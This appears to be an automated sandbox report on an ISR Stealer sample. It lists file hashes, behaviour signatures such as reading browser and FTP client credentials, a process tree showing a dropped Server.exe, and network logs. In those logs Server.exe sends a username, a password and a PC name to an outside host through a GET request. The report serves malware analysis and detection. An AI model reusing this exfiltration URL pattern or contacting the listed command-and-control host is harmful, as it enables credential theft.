Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-10-2024 22:00

General

  • Target

    26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe

  • Size

    946KB

  • MD5

    26148b8e4595061e7716246a926c2eed

  • SHA1

    1a61f0eea11b5cade43f03aea8eda112ee23480c

  • SHA256

    31f9e2b98f96265b9f0b50baa0745dd88077b0a1c3adeb4047d66a6fe801e1a3

  • SHA512

    98eaf519c6d069f9bbeb6c4b71a87dca4a8fbf6ed77bda73280f2187c64d148af633a5c4ed0ce11e7ffba4c04e8c1796e42c0b9ba1232733b8f32869f1f5f7a7

  • SSDEEP

    12288:6aWzgMg7v3qnCiMErQohh0F4CCJ8lny/QLway9wv+U4iG+D:1aHMv6Corjqny/QLE91FiP

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer payload 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:2380

Network

  • US
    DNS
    tapion.bplaced.net
    Server.exe
    Remote address:
    8.8.8.8:53
    Request
    tapion.bplaced.net
    IN A
    Response
    tapion.bplaced.net
    IN A
    162.55.0.137
  • DE
    GET
    http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft
    Server.exe
    Remote address:
    162.55.0.137:80
    Request
    GET /gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: tapion.bplaced.net
    Response
    HTTP/1.1 403 Forbidden
    Date: Wed, 09 Oct 2024 04:16:56 GMT
    Server: Apache
    X-BP-NSA-REQID: (null) a.14UID=98
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Upgrade: h2,h2c
    Connection: Upgrade
    Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
    ETag: "1bbf-5ea8944ceff23"
    Accept-Ranges: bytes
    Content-Length: 7103
    Vary: Accept-Encoding
    Content-Type: text/html
  • 162.55.0.137:80
    http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft
    http
    Server.exe
    580 B
    7.8kB
    8
    8

    HTTP Request

    GET http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft

    HTTP Response

    403
  • 8.8.8.8:53
    tapion.bplaced.net
    dns
    Server.exe
    64 B
    80 B
    1
    1

    DNS Request

    tapion.bplaced.net

    DNS Response

    162.55.0.137

MITRE ATT&CK Enterprise v15


Downloads

  • \Users\Admin\AppData\Roaming\Server.exe

    Filesize

    76KB

    MD5

    afceef7f15a12be583888fd4cf6c78c4

    SHA1

    5574539642da242642b84ab6216edaa3f0bc159e

    SHA256

    33d03627bd449f6dc01bffbb5cc3fb8ebe95dc0f9eb036758440d7e5affbaa4f

    SHA512

    49ea1eeb55f07cc49f55b4337d4dbd537195d689c8c4336aa09e1723273431356f4e493d40f00b61735982924010fdcadbf4d2cd41c74351d1ff4e36e33e27e6
